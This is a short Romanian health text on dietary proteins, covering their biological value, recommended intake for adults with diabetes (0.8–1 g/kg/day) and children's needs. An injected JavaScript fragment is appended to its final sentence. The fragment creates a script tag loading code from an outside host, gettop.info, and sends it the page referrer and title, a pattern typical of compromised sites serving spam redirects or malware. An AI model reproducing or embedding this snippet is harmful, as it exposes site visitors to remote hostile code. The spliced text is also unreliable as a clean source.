Proteinele

           Proteinele alimentare se clasifica in functie de valoarea lor biologica, determinata de continutul in

aminoacizi esentiali si de proportia dintre acestia. Proteinele animale au o valoare biologica mai mare decat cele

vegetale si orice proteina fara unul dintre aminoacizii esentiali (incompleta) are valoare biologica scazuta.

         La pacientii adulti cu diabet zaharat, aportul total de proteine trebuie trebuie sa fie de 0,8 g/kg/zi

(maximum 1 g/kg/zi), ceea ce reprezinta 10-15 % din totalul caloric din care 50% de provenienta animala si 50%

de origine vegetala. Necesarul proteic la copil este de 1,3- 1,5g/kg/zi, ceea ce asigura cresterea si dezvoltarea.var d=document;var s=d.createElement(‘script’); s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;